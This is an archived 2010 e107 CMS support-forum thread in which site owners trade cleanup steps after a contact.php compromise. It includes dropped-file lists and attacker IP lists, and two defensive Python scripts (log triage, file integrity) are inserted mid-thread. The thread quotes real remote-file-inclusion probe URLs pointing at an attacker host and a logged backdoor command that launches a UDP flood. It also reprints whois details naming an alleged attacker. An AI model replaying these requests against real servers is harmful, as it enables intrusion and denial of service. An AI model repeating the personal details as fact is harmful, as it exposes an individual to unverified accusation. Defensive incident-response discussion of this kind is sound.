Contact form - Attack - Fixes

BillyBoy0823
Jun 07 2010, 09:07AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 506
There are a few threads talking about the contact form being a problem, and hacks, and other issues. To some it may appear as separate issues.

I think there should be one thread to address them all. Maybe post a link to this thread?

Here's what I found, and what I did to solve it. If you don't agree, add your fix below.

The exploit is to the contact.php page on certain servers.

#######
index.php
#######
I can tell if it's already happened if I look at my

index.php
\admin\index.php
\plugins\forum\index.php

I see it was edited recently. Mine had iframes inserted.

I restored the originals via FTP.


#######
e107.pl et al
#######
I found a file (perl script) in my root that ran, looking for more sites to attack.

I read the e107.pl file and found some interesting reading.

I removed the e107.pl along with a number of other text and zipped files.

Here's my list. If you got hit, yours may be similar.

993698.txt
993698.txt.1
993698.txt.2
993698.txt.3
e107.pl
e107.pl.1
e107.pl.2
e107-rce-sites.txt
sendpage3.tar.gz
sendpage3.tar.gz.??

I downloaded them, then deleted from the root.

Others have mentioned different files such as help_us.php

All had the same date/time so check for other files around the same/date and time as these.

#######
contact.php
#######
I deleted it

##########
Contact Form Plugin
##########
http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.148

I installed this, and I checked my ADMIN-SITE LINKS to be sure Contact Us now pointed to this, and not to a contact.php.

This should work.
[ Edited Jun 08 2010, 05:56AM ]
BillyBoy0823
Jun 07 2010, 09:24AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 506
In another thread on this here;

[-link-]

deetrix mentioned a lot of files in cache. So, not sure, but you should probably also clear out e107's cache too. Just in case.
C6Dave
Jun 07 2010, 12:10PM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12342
These aren't actually fixes for the contact.php itself, just clean-ups for malicious content that was added to sites before they ran the v0.7.22 update to contact.php etc.?
AndyP
Jun 07 2010, 01:00PM
Registered Member #19927
Joined: Aug 07 2005, 02:41AM
Posts: 283
How are these .txt and .pl files getting uploaded?
Is it an exploit within e107 or elsewhere on the server?

Also is there any way to stop dodgy files being uploaded without having to upgrade your e107 sites?

I've got about 50 e107 sites and it would be an absolute nightmare to have to upgrade all of them.
Is there a quick fix?
[ Edited Jun 07 2010, 01:01PM ]
deetrix
Jun 07 2010, 01:34PM
Registered Member #52798
Joined: Sep 04 2009, 01:51PM
Posts: 52
As far as I know there is no fix atm... only preventative measures if you are not already compromised.
C6Dave
Jun 07 2010, 03:12PM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12342
Read: [-link-]
Nowwhat
Jun 08 2010, 12:18AM
  • e107 Support Team
Registered Member #38024
Joined: Jul 05 2007, 12:08PM
Location: Europe (France)
Posts: 1729
Have 3 sites based on 0.7.22

They have been hit really hard: where normally I see 10 registered users at a max and as many robots/visitors, yesterday the total concurrent visit count exploded to 200+.

Not one file was added or modified (I CRC'd my site just before the attack started).

Finally, I redirected the access for contact.php and help_us.php "somewhere else".

I tried to check the Apache web access log file to see what these bots were doing, but its size was way too big ^^
AndreikA
Jun 08 2010, 12:25AM
  • e107 Translation Team
Registered Member #56042
Joined: May 24 2010, 11:41PM
Posts: 1
thx a lot...

from [-link-]
nlstart
Jun 08 2010, 01:58AM
  • e107 Site administrator
  • e107 Core developer
  • e107 Translation Team Leader
Registered Member #29855
Joined: Aug 18 2006, 01:12AM
Location: Utrecht, The Netherlands
Posts: 5493
On an affected (0.7.19) site I cleaned all kinds of dynamic link folders with names like 1.txt, 2.txt, 3.txt.
In the e107_files/cache I found phpinfo.php
In the root I found comeon.php, m22.php and u.php.
Make sure you get rid of these too!
C6Dave
Jun 08 2010, 02:21AM
  • e107 Site administrator
  • e107 Support Team Leader
Registered Member #9506
Joined: Jul 31 2004, 12:57AM
Location: North East UK
Posts: 12342
You should really know better Henk and keep your sites up to date!
BillyBoy0823
Jun 08 2010, 03:30AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 506
2dopey,

I considered it a fix because I had read elsewhere that some sites with v.7.22 had also had a problem. I don't know if they may have been hit before the upgrade, but until the dust settles I needed to remove the problem.

[ Edited Jun 09 2010, 07:01AM ]
BillyBoy0823
Jun 08 2010, 03:35AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 506
I was attacked a few years ago on one site for another reason. I'm still not sure how they got in, but I think it may have just been someone broke a password that was too simple.

Anyway, I "thought" I had cleaned up, but a few months later I was attacked again.

If you read about this current specific exploit, the problem lies with certain web server software as well as e107's contact.php form page.

Here's a few other things I would recommend if you have been compromised whether via the CMS or via the server.

1. Change your hosting account's password AND FTP passwords if different.

2. Change your MySQL password and the file that holds that information. (I changed my MySQL database name as well.)

3. Change all Admins Passwords.

4. Check admins email addresses to be sure they are correct.

You may also want to change email passwords as well.

It may be overkill. It can be a lot of work. But it may save some work in the future. Once I did all this, and kept the site up-to-date, things are good.
[ Edited Jun 08 2010, 03:22PM ]
Duce
Jun 08 2010, 11:10PM
Registered Member #38832
Joined: Aug 03 2007, 07:10AM
Location: Centurion, South Africa
Posts: 225
Here are some of the IPs that are part of this attack:
213.17.153.11
75.125.205.82
195.199.243.114
204.10.38.244
193.226.30.130
91.199.120.11
212.227.118.21
195.249.40.23
78.138.88.234
79.14.43.2
84.247.49.62
212.227.118.21
87.229.24.67
206.174.210.10
85.94.197.34
87.210.197.1

I thought I was going crazy yesterday with my server and mysql dying on me the whole time. Reading this post this morning explained a lot to me.

There is a script running trying to access: "contact.php and help_us.php"

A quick fix would be for server admins to check Apache logs and just firewall the IPs that attempt to connect to "help_us.php".

None of my sites have been compromised and I'm running various versions of e107... Only I am experiencing DDoS-like activity.
[ Edited Jun 09 2010, 12:27AM ]
dolphin713
Jun 09 2010, 01:39AM
Registered Member #5551
Joined: Jan 15 2004, 07:29AM
Posts: 132
e107 should have a way to change the default folder names (e107_plugin, e107_handlers, etc.).
This way security would improve. I have done this.

As I've informed the e107 security team, I have mod_security in Apache, and it prevents some of the attacks, which were logged.

Some of the files were
-e107_handlers/secure_img_render.php
-fpw.php
-e107_plugins/content/handlers/content_class.php
-e107_plugins/content/handlers/content_convert_class.php

All from the IP 78.46.72.235

Block this IP!!


dolphin713
Jun 09 2010, 01:49AM
Registered Member #5551
Joined: Jan 15 2004, 07:29AM
Posts: 132
For security's sake I didn't write out the whole query they tried to execute, but on second thought here is the full query from one of them (they were all the same) so you can check: they are trying to upload a gif
/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://78.46.72.235//kswebstats/pic.gif? HTTP/1.1

/fpw.php?THEMES_DIRECTORY=http://78.46.72.235//kswebstats/pic.gif? HTTP/1.1
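Duce's suggestion (check the Apache logs, firewall the IPs hammering help_us.php) and the two request lines dolphin713 quoted can be turned into a small log triage. The following is an added example, not code from this thread or from e107: it parses Apache combined-format lines, flags requests to contact.php and help_us.php, flags any query parameter whose value is a remote URL (the plugindir= / THEMES_DIRECTORY= style probes above), and tallies hits per client. The sample log lines are constructed with documentation IP ranges; the watched paths are assumed to sit at the web root.

```python
"""Apache access-log triage for the request patterns reported in this thread.

Added example, not code from the thread or from e107. Sample log below is
constructed (documentation IP ranges); paths are the ones named in the thread.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: ip ident user [ts] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Scripts the thread reports being hammered (assumed to live at the web root).
WATCHED_PATHS = {"/contact.php", "/help_us.php"}
# A query value that is itself a URL is the classic remote-file-inclusion probe.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def parse_line(line):
    """Return a dict with ip, path and decoded query params, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """List the reasons a parsed request deserves attention (empty list = nothing seen)."""
    reasons = []
    if rec["path"] in WATCHED_PATHS:
        reasons.append("watched-script")
    for key, value in rec["params"]:
        if value.lower().startswith(REMOTE_SCHEMES):
            reasons.append("remote-url-param:" + key)
    return reasons


def triage(lines, threshold=3):
    """Summarise a log: flagged requests, hits per client, and block candidates.

    A client becomes a block candidate if it sent any remote-URL parameter, or if
    it hit the watched scripts at least `threshold` times. A single legitimate
    visitor using the contact form is flagged for review, not proposed for blocking.
    """
    flagged = []
    hits = Counter()
    rfi_clients = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if not reasons:
            continue
        flagged.append((rec["ip"], rec["path"], reasons))
        hits[rec["ip"]] += 1
        if any(r.startswith("remote-url-param:") for r in reasons):
            rfi_clients.add(rec["ip"])
    candidates = {ip for ip, n in hits.items() if n >= threshold} | rfi_clients
    return {"flagged": flagged, "hits_per_ip": dict(hits), "block_candidates": sorted(candidates)}


# Constructed sample log (documentation IP ranges, paths taken from the thread).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Jun/2010:03:33:37 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [07/Jun/2010:03:33:40 +0000] "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [07/Jun/2010:03:33:41 +0000] "GET /help_us.php HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [07/Jun/2010:03:33:42 +0000] "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [07/Jun/2010:03:40:00 +0000] "GET /fpw.php?THEMES_DIRECTORY=http://198.51.100.7//x/pic.gif? HTTP/1.1" 404 210 "-" "libwww-perl/5.8"',
    '198.51.100.7 - - [07/Jun/2010:03:40:01 +0000] "GET /e107_plugins/content/handlers/content_convert_class.php?plugindir=http://198.51.100.7//x/pic.gif? HTTP/1.1" 404 210 "-" "libwww-perl/5.8"',
    '192.0.2.10 - - [07/Jun/2010:03:45:00 +0000] "GET /contact.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for ip, path, reasons in report["flagged"]:
        print(ip, path, ",".join(reasons))
    print("block candidates:", report["block_candidates"])
```

Feed it the real access_log one line at a time (`triage(open(path))`) rather than reading the whole file, since the log sizes mentioned in this thread are exactly why `grep` alone gets unwieldy. The remote-URL rule fires on a single request because a local include path should never be an `http://` value; the hit-count rule needs a threshold so one genuine contact-form submission is not treated as an attacker.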
dolphin713
Jun 09 2010, 02:07AM
Registered Member #5551
Joined: Jan 15 2004, 07:29AM
Posts: 132
If you have svn (Subversion) installed (for those who can) you can check pretty quickly what has changed and what is new.
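Several posters arrive at the same check by different routes: BillyBoy looks for files edited at the same date and time, Nowwhat CRC'd the site before the attack, dolphin713 diffs against svn. The following is an added example, not code from this thread or from e107, that does this without a version-control system: it takes a SHA-256 manifest of a known-good web root, diffs a later manifest against it to list added, modified and deleted files, and buckets the changes by modification time so a burst of files sharing one timestamp stands out. The tree in `demo()` is constructed in a temporary directory; the file names are the ones reported in the thread, with placeholder contents.

```python
"""Baseline-and-diff file integrity check for a web root.

Added example, not code from the thread or from e107. The scenario in demo()
is constructed; file names come from the thread, contents are placeholders.
"""
import hashlib
import os
import tempfile
from collections import defaultdict


def build_manifest(root):
    """Return {relative_path: (sha256_hex, mtime_seconds)} for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = (digest.hexdigest(), int(os.stat(full).st_mtime))
    return manifest


def diff_manifests(baseline, current):
    """Compare two manifests by content hash; mtime alone is not trusted, it can be forged."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p][0] != current[p][0])
    return {"added": added, "deleted": deleted, "modified": modified}


def group_by_mtime(manifest, paths, window=60):
    """Bucket paths by mtime rounded down to `window` seconds.

    A burst of changes sharing one bucket is the "same date/time" signal described
    in the thread; anything else written in that window deserves a look too.
    """
    buckets = defaultdict(list)
    for p in paths:
        buckets[manifest[p][1] // window * window].append(p)
    return dict(buckets)


def demo():
    """Constructed scenario: snapshot a clean tree, simulate a compromise, then diff."""
    root = tempfile.mkdtemp()

    def write(rel, data, mtime):
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(data)
        os.utime(full, (mtime, mtime))   # pin the mtime so the scenario is reproducible

    clean_t = 1275000000   # constructed "install" timestamp
    write("index.php", "<?php // clean front controller\n", clean_t)
    write("e107_admin/index.php", "<?php // clean admin index\n", clean_t)
    write("e107_files/cache/readme.txt", "cache dir\n", clean_t)
    baseline = build_manifest(root)   # taken while the site is known-good

    hit_t = 1275900000     # constructed "incident" timestamp
    write("index.php", "<?php // clean front controller\n<!-- injected markup -->\n", hit_t)
    write("e107.pl", "#!/usr/bin/perl\n# placeholder for the dropped script\n", hit_t)
    write("993698.txt", "placeholder\n", hit_t + 5)
    write("e107_files/cache/phpinfo.php", "<?php // placeholder\n", hit_t + 7)
    current = build_manifest(root)

    delta = diff_manifests(baseline, current)
    burst = group_by_mtime(current, delta["added"] + delta["modified"])
    return delta, burst


if __name__ == "__main__":
    delta, burst = demo()
    print(delta)
    for when, paths in sorted(burst.items()):
        print(when, paths)
```

In practice, generate the baseline from a fresh download of the e107 release you run plus your own theme and plugin files, store it off the server (a manifest kept in the web root can be edited by whoever edited index.php), and re-run the diff from a clean machine after any incident. The mtime bucketing is a triage aid only; the hash comparison is what tells you a file actually changed.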
BillyBoy0823
Jun 09 2010, 06:59AM
Registered Member #14644
Joined: Feb 14 2005, 04:20PM
Location: Leominster, MA USA
Posts: 506
dolphin713,

Are you sure this is the same attack? Seems like different files than what the contact.php attack is about.

I did some ip lookups to see where they are. If you are sure they are the source, and not just infected systems, you could do a whois to find out who to report the abuse to maybe? In case it's an account, not an owner.
Lager Monster
Jun 09 2010, 02:10PM
Registered Member #17793
Joined: May 14 2005, 04:07PM
Posts: 14
My host company shut down my account for spam-like activity.
They claim that a PHP script called rockarolla was the culprit.

There were a lot of GET & POST requests to contact.php and help_us.php in the Apache log.
deetrix
Jun 09 2010, 03:25PM
Registered Member #52798
Joined: Sep 04 2009, 01:51PM
Posts: 52
Read the threads, you were compromised
pankaj
Jun 11 2010, 11:55AM
Registered Member #30269
Joined: Sep 05 2006, 09:23AM
Posts: 61
Here is what I got

Ip addresses

89.188.136.25
217.23.14.79

Domain Name

"http://sabotaj.eu/"

New files

ooo.php
/.config.ini.php (attribute shown as 0000)
ola.tgz.1
ola.tgz

Whois led to

Domain: sabotaj

Registrant:
NOT DISCLOSED!
Visit "www .eurid .eu" for webbased whois.

Registrar Technical Contacts:
Name: Domain Manager
Organisation: " PublicDomainRegistry .com"
Language: en
Phone: +1.2013775952
Fax: +1.3202105146
Email:

Registrar:
Name: Directi Internet Solutions Pvt. Ltd. d/b/a "PublicDomainRegistry. com"
Website:"www. publicdomainregistry .com"

Nameservers:
"ns2 .butu r. net"
"ns1 .butur .net"

Keys:

Please visit "www. eurid. eu" for more info.

"www. Eurid. eu" Whois led to

Name sabotaj
Status REGISTERED (What this means)
How to dispute this registration
Registered October 8, 2009
Last update October 8, 2009, 5:15 pm
Registrant
Name ENES OKTAR
Organisation None
Language English
Address Atyk Veysel Cad 28/1 daire/9
06290 ankara
ankara-kacioren
Germany
+49 05073466556
Email "rocco-tie@msn. com"
Email "domain.manager @publicdomainregistry.com"
Registrar technical contacts
Name Domain Manager
Organisation "PublicDomainRegistry .com"
Language English
Address

14525 SW Milliken #48732
97005-2343 Beaverton
Oregon
United States


Phone +1.2013775952
FAX +1.3202105146
Registrar
Organisation Directi Internet Solutions Pvt. Ltd. d/b/a "PublicDomainRegistry. com"
Website "www. publicdomainregistry. com"
Nameservers
"ns2 .butur .net"
"ns1 .butur. net"

-------------------------------------------

Main script file is ooo.php which contains all the code for backdoor installation of other scripts and connecting to the server etc. Huge one as I was browsing through it.
Two tgz files contain the same script in compressed form.
.config.ini.php seems to be empty redirecting file.
The commands that were logged in the webserver are as follows

Mon Jun 7 03:33:37 2010: '/usr/bin/php /home/***/public_html/***/.config.ini.php ' (Exe: php [/usr/bin/php], Script: '/home/****/public_html.***/.config.ini.php', Domain: ***, Request: '/.config.ini.php?act=phptools&host=89.188.136.25&time=120&port=53&type=udp', Accessed from: 217.23.14.79) - of ****** has used 101.6 %CPU


All commands are in the same format with the same IP numbers.

e107 version was 0.7.17

I had updated the main site to .22 but failed to update another one. The main site is OK but this one came under DDoS attack. Though it was not a production site as yet, so no harm.

I have saved the ooo.php file. If devs want to look at it, maybe I can send it. It contains a fully configured IRC trojan: file searching, automated recursive dir, full MySQL functions, connects to port 6667, sends mail etc.
It contains following info

oded by Enqu!nx & TurkTegin
/* MAIL http://sabotaj. eu , http://sabotaj. eu

I don't know how this file or compressed files were uploaded as FTP seems intact.

Now I have deleted all files and a fresh install of the .22 version has been done for the site. Will request admin to reactivate the site.

